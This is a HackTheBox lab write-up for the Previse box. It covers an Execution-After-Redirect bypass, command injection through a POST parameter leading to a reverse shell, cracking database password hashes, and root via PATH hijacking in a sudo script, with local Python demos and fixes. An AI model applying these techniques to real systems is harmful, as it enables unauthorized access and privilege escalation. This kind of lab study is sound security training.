HackTheBox Writeup — Previse

Hello guys, I am Faisal Husaini. My username on HTB is “fa1sal”. Also join me on Discord.

The IP of this box is 10.10.11.104

Port Scan / Enumeration

nmap -sC -sV -p- -Pn --min-rate=10000 -oN nmap 10.10.11.104

Way to User

Checking the web server, we get redirected to a login page

Running a Gobuster scan against the web server turns up multiple PHP files, all answering with a 302 status code

Trying each one of them redirects back to the login page as usual, so I intercept the request for accounts.php in Burp

Intercepting the response to that request shows it also redirects to login.php, yet the 302 response carries the full page body underneath its headers

Changing the status line in the response from 302 Found to 200 OK and forwarding it

The browser now renders accounts.php instead of following the redirect, and the page offers a form to register a new user. The redirect is only a header: the script sends `Location: login.php` but never calls exit(), so the code after it keeps running and rendering, a classic Execution After Redirect (EAR) bug

Adding a new user and intercepting that request as well

Intercepting the response to it and changing the status code again; with this bug the server-side code that handles the form runs regardless, so the status rewrite is only needed to see the resulting page rather than being sent back to the login screen

To avoid doing this by hand for every page, add a Match and Replace rule in Burp's Proxy options on response headers, replacing `HTTP/1.1 302 Found` with `HTTP/1.1 200 OK`

My new user is created successfully
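The bypass described above, as an added example that is not code from the original writeup or from the box: two constructed local servers stand in for the application, one that sends the redirect header but keeps rendering the protected page (the bug), one that stops at the redirect (the fix). The client never follows redirects, which is what rewriting 302 to 200 in Burp achieves, and a small checker flags every page whose redirect still carries a body. The paths, page markup and form field names are assumptions for the demo.

```python
# Added example (not from the writeup or the box): an Execution-After-Redirect (EAR)
# check and the user-registration replay it enables. Two constructed local servers
# stand in for the app: one redirects but keeps rendering the protected page (the bug),
# the other stops at the redirect (the fix). Paths and page markup are assumptions.
import http.client
import http.server
import threading
import urllib.parse

# Constructed protected pages; the real application's markup is not reproduced.
PROTECTED_PAGES = {
    "/accounts.php": b"<h1>Add user</h1><form method='POST'>"
                     b"<input name='username'><input name='password'></form>",
    "/files.php": b"<h1>Files</h1><a href='download.php?file=siteBackup.zip'>siteBackup.zip</a>",
}
REGISTERED_USERS = []  # what the vulnerable POST handler "inserts into the database"


class VulnerableHandler(http.server.BaseHTTPRequestHandler):
    """Mimics header('Location: login.php') with no exit(): code after it still runs."""
    EAR = True  # set to False for the fixed behaviour

    def _redirect_to_login(self, body):
        # With the bug, the protected body is sent right after the 302 headers.
        payload = body if self.EAR else b""
        self.send_response(302)
        self.send_header("Location", "/login.php")
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(payload)))
        self.end_headers()
        self.wfile.write(payload)

    def do_GET(self):
        page = PROTECTED_PAGES.get(self.path)
        if page is None:
            self.send_response(404)
            self.end_headers()
            return
        self._redirect_to_login(page)

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        if self.EAR and self.path == "/accounts.php" and "username" in form:
            REGISTERED_USERS.append(form["username"][0])  # runs despite the redirect
        self._redirect_to_login(b"<p>user added</p>")

    def log_message(self, *args):  # keep the demo quiet
        pass


class FixedHandler(VulnerableHandler):
    """Same app with exit() after header(): nothing is rendered or executed past it."""
    EAR = False


def start_server(handler):
    """Serve on an ephemeral localhost port in a daemon thread; returns (host, port)."""
    srv = http.server.HTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv.server_address


def raw_request(addr, method, path, body=None):
    """One request, redirect NOT followed (what rewriting 302 -> 200 in Burp achieves)."""
    conn = http.client.HTTPConnection(addr[0], addr[1], timeout=5)
    headers = {"Content-Type": "application/x-www-form-urlencoded"} if body else {}
    conn.request(method, path, body=body, headers=headers)
    resp = conn.getresponse()
    data = resp.read()
    conn.close()
    return resp.status, resp.getheader("Location"), data


def find_ear_pages(addr, paths):
    """Return the paths whose redirect response still carries page content."""
    leaking = []
    for path in paths:
        status, location, data = raw_request(addr, "GET", path)
        if status in (301, 302, 303, 307, 308) and location and data.strip():
            leaking.append(path)
    return leaking


def register_user(addr, username, password):
    """Replay the add-user POST to accounts.php; returns the HTTP status."""
    body = urllib.parse.urlencode({"username": username, "password": password})
    return raw_request(addr, "POST", "/accounts.php", body)[0]


if __name__ == "__main__":
    vuln, fixed = start_server(VulnerableHandler), start_server(FixedHandler)
    print("EAR pages, vulnerable app:", find_ear_pages(vuln, PROTECTED_PAGES))
    print("EAR pages, fixed app:     ", find_ear_pages(fixed, PROTECTED_PAGES))
    register_user(vuln, "fa1sal", "Password1!")
    register_user(fixed, "nobody", "Password1!")
    print("users created through the redirect:", REGISTERED_USERS)
```

Against a real target the same check is one curl call per Gobuster hit, `curl -s -D - http://target/accounts.php`: a 302 whose headers are followed by a full HTML body is an EAR candidate, and a POST to it will be processed whether or not the browser ever sees the page.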

After logging in with my new user, I can access more of the site's functionality, the interesting part being the Files section, where a site backup file is available for download

Getting the site backup file onto my local machine and unzipping it

One of the files, config.php, contains the database credentials, but there is nowhere to use them yet since no database port is exposed externally

Another file, logs.php, is more interesting: it builds a shell command with the value of the POST parameter delim and runs it through exec() without any sanitisation, so anything appended to delim after a shell separator runs on the server

Intercepting a request to logs.php in the web app

Changing the request method from GET to POST and adding the delim parameter with a ping-back command to my local machine

Running tcpdump for ICMP on my machine confirms command execution when the ping arrives

Changing the value to a reverse shell payload this time

Getting a reverse shell on my netcat listener
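The injection above, as an added example that is not the box's code: the unsanitised exec() shape the writeup describes for logs.php is rebuilt in Python next to two fixed variants, so the payload can be run against all three side by side. The log-processing script is replaced by a constructed stand-in (printf, which just echoes the delimiter it was handed); the function names and the allow-list of delimiter names are assumptions.

```python
# Added example (not the box's code): the unsanitised exec() shape described for logs.php,
# rebuilt in Python next to two fixed variants so the injection can be run side by side.
# The log-processing script is replaced by a constructed stand-in: printf, which just
# echoes the delimiter it was handed. Function names and the allow-list are assumptions.
import shlex
import subprocess

# Assumed set of legitimate delimiter names; anything else is treated as an injection attempt.
ALLOWED_DELIMS = ("comma", "space", "tab")
STAND_IN = "printf 'delim=%s\\n'"  # shell form of the constructed log-processing command


def export_logs_vulnerable(delim):
    """exec("... log_process.py {$_POST['delim']}") equivalent: user input becomes shell syntax."""
    return subprocess.run(STAND_IN + " " + delim, shell=True,
                          capture_output=True, text=True).stdout


def export_logs_quoted(delim):
    """Minimal PHP-style fix: escapeshellarg() (shlex.quote here) makes delim one literal word."""
    return subprocess.run(STAND_IN + " " + shlex.quote(delim), shell=True,
                          capture_output=True, text=True).stdout


def export_logs_safe(delim):
    """Preferred fix: allow-list the value and pass it as an argv element, no shell at all."""
    if delim not in ALLOWED_DELIMS:
        raise ValueError(f"unexpected delim value: {delim!r}")
    return subprocess.run(["printf", "delim=%s\\n", delim],
                          capture_output=True, text=True).stdout


def injection_payload(command):
    """Build the delim value the writeup uses: a legitimate value, then an extra command."""
    return "comma; " + command


if __name__ == "__main__":
    payload = injection_payload("echo INJECTED")
    print("vulnerable:", repr(export_logs_vulnerable(payload)))
    print("quoted:    ", repr(export_logs_quoted(payload)))
    try:
        export_logs_safe(payload)
    except ValueError as err:
        print("safe:       rejected ->", err)
```

In the real request the same value goes in the POST body, URL-encoded: spaces as `+` or `%20`, and `;`, `&` and `|` percent-encoded, otherwise `&` ends the delim parameter before the injected command.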

The user flag is in the home folder of the m4lwhere user

Checking for locally listening ports (for example with ss -tlnp) shows that the MySQL port is open on localhost only, which is why the credentials were useless from outside

So I use the credentials from config.php to log into the database as the MySQL root user

Dumping the users and their password hashes from the database

Using John to crack the hash of the user m4lwhere

Switching to the new user with the su command

Way to Root

Running sudo -l, we can see that the user m4lwhere can run the access_backup.sh script as root

Checking the contents of the file, we can see that it runs gzip and also date, both by bare name rather than absolute path. Because the script runs as root and resolves the commands through the caller's PATH, whichever gzip or date appears first in PATH is what executes, which makes both of them candidates for path hijacking. This only works when sudo passes the caller's PATH through: if the Defaults shown by sudo -l include secure_path, PATH is reset before the script runs and the trick fails

So first I set the PATH environment variable so that the current user's home directory comes first

Creating a file called date containing my reverse shell payload and making it executable with chmod +x

Running the script with sudo leads to a reverse shell as root on my netcat listener
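The hijack above, as an added example that is not the box's script: a stand-in backup script with the same shape (gzip and date called by bare name) is built in a temporary directory together with a fake date, and run once with the hijack directory first in PATH and once with a secure_path-style PATH. It runs as the current user, so it shows which date binary executes rather than performing a real escalation; the script contents, file names and paths are assumptions.

```python
# Added example (not the box's script): PATH hijacking of a command called by bare name
# inside a script that is run with elevated privileges. Everything is built in a temp
# directory and run as the current user, so it shows which 'date' binary is executed, not
# a real escalation. The stand-in script, fake date and paths are assumptions.
import os
import stat
import subprocess
import tempfile
import textwrap

# Constructed stand-in with the shape the writeup describes: gzip and date by bare name.
BACKUP_SCRIPT = textwrap.dedent("""\
    #!/bin/bash
    gzip -c "$1" > "$2/$(date +%Y%b%d)_access.gz"
""")

# The attacker's 'date': record that it ran as whoever invoked the script, then hand over to
# the real binary so the script completes without a visible error.
FAKE_DATE = textwrap.dedent("""\
    #!/bin/bash
    echo "fake date ran as $(id -un)" >> "$HIJACK_LOG"
    exec /bin/date "$@"
""")

# A PATH of the kind sudo's secure_path enforces: no user-writable directory in it.
SYSTEM_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"


def write_executable(path, content):
    with open(path, "w") as fh:
        fh.write(content)
    os.chmod(path, os.stat(path).st_mode | stat.S_IXUSR)


def prepare(workdir):
    """Drop the script, a fake date in a hijack directory, and a small log to compress."""
    hijack_dir = os.path.join(workdir, "hijack")
    os.makedirs(hijack_dir)
    write_executable(os.path.join(workdir, "access_backup.sh"), BACKUP_SCRIPT)
    write_executable(os.path.join(hijack_dir, "date"), FAKE_DATE)
    with open(os.path.join(workdir, "access.log"), "w") as fh:
        fh.write('10.10.14.5 - - "GET /login.php HTTP/1.1" 200\n')  # constructed log line
    return hijack_dir


def run_backup(workdir, path_env):
    """Run the script with a given PATH; return the fake date's log (empty if it never ran)."""
    log = os.path.join(workdir, "hijack.log")
    open(log, "w").close()
    env = {"PATH": path_env, "HIJACK_LOG": log}
    subprocess.run(["bash", os.path.join(workdir, "access_backup.sh"),
                    os.path.join(workdir, "access.log"), workdir], env=env, check=True)
    with open(log) as fh:
        return fh.read().strip()


def demo():
    """Returns (hijacked_result, protected_result) for the two PATH settings."""
    with tempfile.TemporaryDirectory() as workdir:
        hijack_dir = prepare(workdir)
        hijacked = run_backup(workdir, hijack_dir + ":" + SYSTEM_PATH)  # export PATH=~/hijack:$PATH
        protected = run_backup(workdir, SYSTEM_PATH)                     # what secure_path gives
        return hijacked, protected


if __name__ == "__main__":
    hijacked, protected = demo()
    print("PATH with hijack dir first:", hijacked or "(real date ran)")
    print("secure_path-style PATH:    ", protected or "(real date ran)")
```

The fake date hands over to the real binary after doing its work so the script finishes cleanly; a reverse shell payload in its place would be run as root for as long as the script waits on it. The protected run is the behaviour to expect whenever sudo -l lists secure_path in its Defaults.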

The root flag is found on the /root directory

Faisal Husaini

Hacker | Red Teamer | Python Coder | Gamer | Reverse Engineering Lover